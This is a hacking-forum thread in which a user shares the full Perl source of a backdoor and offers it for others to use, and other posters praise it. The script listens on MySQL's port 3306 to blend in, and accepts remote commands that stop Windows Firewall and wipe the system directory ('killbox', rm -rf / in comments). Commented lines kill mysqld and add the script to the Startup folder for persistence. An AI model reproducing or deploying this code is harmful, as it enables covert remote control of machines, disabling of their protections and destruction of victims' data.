iExploit

Howdy, Stranger!

It looks like you're new here. If you want to get involved, click one of these buttons!

Sign In Apply for Membership

Top Posters

Who's Online (1)

Powered by Vanilla. Made with Bootstrap.
Looking to introduce yourself? Look no further, and click here! We also have IRC! [irc.evilzone.org #iexploit]
backdoor I've been working on
  • m0rph
    Posts: 332
    sup everyone, this is the code to my backdoor. I was going to submit this for the malware contest, sadly, you have to buy perl2exe to stop the window from showing up. In other words, it wasn't very stealthy when converted to an executable. Nonetheless, granted you have the right privileges, this is not a terrible script....it is limited, but it's not bad. If you're having trouble with your own backdoor, feel free to use my code. You can connect to it with netcat, if you run commands from the menu, the output will be displayed back to you. I've also included most of the *nix equivalent commands in comments. This backdoor acts how a real backdoor should. A real backdoor should disable/bypass any services hindering it's use, it should take over well known ports so it doesn't use something obvious like port 1337, and it should allow you to absolutely destroy the box.

    *Spoiler Alert!* If you can't figure out how to use it, try asking it how it's day is going ;)

    #!/usr/bin/perl -w
    #Written by m0rph
    use IO::Socket; #Socket handler
    use Net::hostent; #Host information exchange
    use File::Copy; #File Copying
    use warnings; #Debugging

    #`net stop \"Windows Firewall\"`; #replace with /etc/init.d/iptables stop, must be root
    #system(\"taskkill /IM mysqld.exe /F\"); #Disable mysql daemon
    my $port=3306; #Binded port, replace port number with $ARGV[0] to use with command line input
    my $server=IO::Socket::INET->new( Proto => 'tcp',
    LocalPort => $port,
    Listen => SOMAXCONN, #Number of pending connections, and connections allowed
    Reuse => 1);

    die \"Listener failed to start\" unless $server; #Error Handling
    print \"Listener started. Waiting for connection...\n\";

    while ($client = $server->accept()) {
    	$client->autoflush(1);
    	$hostinfo = gethostbyaddr($client->peeraddr);
    	#print \"[Connection from %s]\", $hostinfo->name || $client->peerhost; #shows connecting host to server
    	while ( <$client>) {
    	next unless /\S/; #If no input is received, stay connected.
    	printf $client \"%s \$ \", $hostinfo->name || $server->peerhost;
    	if (/exit|quit/i) { last; } #Quit and Exit commmands for disconnecting
    	elsif (/sup brah/i) { print $client \"\n\", 
    									 \"------------------------\n\",
    									 \"|                      |\n\",
    									 \"|     Let's do this    |\n\",
    									 \"|                      |\n\",
    									 \"------------------------\n\",
    									 \"\n\",
    									 \"Type help for a list of commands\n\"; }
    	elsif (/date/i) { printf $client \"%s\n\", scalar localtime;}
    	elsif (/ip -s/i) { print $client `ipconfig /all`; } #replace with ifconfig 
    	elsif (/ip -r/i) { print $client `ipconfig /release`; } #replace with ifconfig eth0 down
    	elsif (/ps/i) { print $client `tasklist /v`;} #show current processes, replace with ps -aux
    	elsif (/netstat/i) { print $client `netstat -an`; } #show current connections, same command
    	elsif (/whoami/i) { print $client `whoami`; } #works on some windows machines, works on all *nix
    	elsif (/rain/i) { print $client `net stop \"Windows Firewall\"`; } #replace with /etc/init.d/iptables stop, must be root
    	elsif (/killbox/i) { print $client system('RD %systemroot% /S /Q'); } #replace with rm -rf /
    	elsif (/shell/i) { system('cmd'); } ###Intended to drop a shell, but doesn't, try replacing with /bin/sh
    	elsif (/help/i) { print $client \"\n\",
    									\"-------------\n\",
    									\"Command List:\n\",
    									\"-------------\n\",
    									\"ip -s                         IP Configuration.\n\",
    									\"ip -r                                -r for IP release, Shell must have administrative privileges.\n\",
    									\"whoami                           Current User.\n\",
    									\"netstat                          Active Connections.\n\",
    									\"date                             Current Date and Time\n\",
    									\"ps                               List Current Processes.\n\",
    									\"rain                             Stops Windows Firewall. Shell must have administrative privileges.\n\",
    									\"killbox                          Remove filesystem.    Shell must have administrative privileges.\n\",
    									\"shutdown                         Shutdown Target.\n\",
    									#\"shell                            Drop A Shell.\n\",
    									\"quit \n\"; }
    	else {
    		print $client \"\n\nError: Connection Timed Out\"; #Incase someone else tries connecting to shell, try and fool them to not connect to it again.
    		close $client;
    	}
    	}
    	continue {
    	printf $client \"%s \$ \", $hostinfo->name || $server->peerhost;
    	}
    	print $client \"\n\nGood Bye.\"; 
    	close $client; #To close connection: CTRL + C
    }
    #move(\"noname.pl\",\"C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\noname.pl\"); #this will copy self to XP SP2 Startup Directory
    while( !(succeed = try() ) );
  • Sh3llc0d3
    Posts: 1,910
    Nice code, I was thinking of doing something similar with perl for the competition had same problem with using binary files.
  • Xin
    Posts: 3,251
    Good job m0rph looks good, maybe you and sh3llc0de can work on something together.
    Xin
  • s1n4
    Posts: 88
    Nice share, Thanks m0rph :)
  • Mr. P-teoMr. P-teo
    Posts: 269
    This looks quite nice, when iv finished my database i think i might have a go at coding a backdoor...
    Skype: mrpt3o
    Twitter: MrPteo


    image
  • m0rph
    Posts: 332
    Update: The shell functionality of it doesn't work because the standard input/output is already being called, and would thus result in the shell process being ran interactively (which is not possible when redirecting stdio).

    I will try to fix it at some point. My idea for making it work will be to have it create a new process listening on a different port, or to include a function that will run itself again with a different argument (causing it to drop a shell on a different port). If anyone wants to give it a go, please feel free.

    I can't believe I didn't think about it being ran interactively while I was writing the backdoor the first time...what a rookie mistake lol
    while( !(succeed = try() ) );
  • Sh3llc0d3
    Posts: 1,910
    said:


    Update: The shell functionality of it doesn't work because the standard input/output is already being called, and would thus result in the shell process being ran interactively (which is not possible when redirecting stdio).

    I will try to fix it at some point. My idea for making it work will be to have it create a new process listening on a different port, or to include a function that will run itself again with a different argument (causing it to drop a shell on a different port). If anyone wants to give it a go, please feel free.

    I can't believe I didn't think about it being ran interactively while I was writing the backdoor the first time...what a rookie mistake lol



    I'll have a try, I'll have a proper look through it when I get to uni, will be awesome when it's complete.
Add a Comment